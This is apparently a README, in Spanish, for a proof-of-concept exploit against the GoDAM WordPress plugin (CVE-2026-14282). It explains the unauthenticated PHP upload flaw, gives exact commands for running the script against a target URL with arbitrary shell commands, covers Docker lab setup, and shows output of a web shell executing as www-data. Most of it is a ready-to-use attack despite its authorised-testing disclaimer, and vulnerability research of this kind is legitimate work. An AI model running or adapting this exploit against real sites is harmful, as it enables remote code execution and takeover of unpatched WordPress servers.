
GoDAM WordPress plugin <= 1.12.2 unauthenticated file upload RCE (CVE-2026-14282)
Autor: nullwhisper
Caso de uso: solo investigación de seguridad autorizada / validación de vulnerabilidades.
Las versiones <= 1.12.2 del plugin GoDAM para WordPress registran un campo de WPForms llamado
godam_record. El gestor de subida save_video_file() está enganchado a la
acción pública wpforms_process_before_filter, por lo que se ejecuta antes de cualquier
comprobación de autenticación. El gestor confía en la cabecera Content-Type
controlada por el atacante, acepta un archivo PHP siempre que el tipo MIME comience con video/, y
lo mueve al directorio servido por web wp-content/uploads/godam/wpforms/.
Esto permite a un atacante no autenticado subir y ejecutar código PHP
arbitrario.
.
├── cve_2026_14282_poc.py # PoC principal
├── lab/
│ ├── docker-compose.yml # Laboratorio WordPress
│ └── setup.php # Crea un formulario de WPForms con el campo GoDAM
├── requirements.txt
└── README.md
pip3 install -r requirements.txt
python3 cve_2026_14282_poc.py -u https://target.com/page-with-form
El script detecta automáticamente el ID del formulario de WPForms y el ID del campo GoDAM. Si la página contiene varios formularios o la detección falla, use:
python3 cve_2026_14282_poc.py -u https://target.com/page-with-form \
--form-id 4 --field-id 1 --cmd "whoami"
Descargue los plugins vulnerables (no redistribuya los binarios):
mkdir -p lab/wpforms-lite lab/godam
cd lab/wpforms-lite
wget https://downloads.wordpress.org/plugin/wpforms-lite.latest-stable.zip
unzip wpforms-lite.latest-stable.zip
rm wpforms-lite.latest-stable.zip
cd ../godam
wget https://downloads.wordpress.org/plugin/godam.1.12.2.zip
unzip godam.1.12.2.zip
rm godam.1.12.2.zip
cd ../..
Inicie el laboratorio:
cd lab
docker compose up -d
Complete el instalador de WordPress en http://127.0.0.1:8092.
Instale y active los plugins, luego cree el formulario y la página de prueba:
docker exec -i lab-wpcli-1 wp plugin activate wpforms-lite --allow-root
docker exec -i lab-wpcli-1 wp plugin activate godam --allow-root
docker exec -i lab-wpcli-1 php /tmp/setup.php
Ejecute el PoC:
python3 cve_2026_14282_poc.py -u 'http://127.0.0.1:8092/?page_id=7' --cmd 'echo PWNED'
Probado en WordPress 6.8 + WPForms Lite última versión + GoDAM 1.12.2.
[*] Detecting WPForms form and GoDAM field...
[*] Found form ID 4, GoDAM field(s): 1
[*] Trying upload via field 1...
[+] Shell uploaded and executed: http://127.0.0.1:8092/wp-content/uploads/godam/wpforms/godam-shell.php
[+] Output: GODAM-RCE-Linux ... uid=33(www-data) gid=33(www-data) groups=33(www-data)
[*] Command output:
GODAM-RCE-Linux ... PWNED
Este repositorio contiene solo el PoC y los archivos de orquestación del laboratorio. Los binarios de los plugins vulnerables se excluyen para evitar aumentar el tamaño y problemas de distribución. Descargue las versiones vulnerables específicas desde WordPress.org para su propio laboratorio.
Esta herramienta es solo para pruebas de seguridad autorizadas e investigación. No la use contra sistemas que no le pertenezcan o para los que no tenga permiso explícito de probar. El autor no es responsable del mal uso o de los daños causados por este código.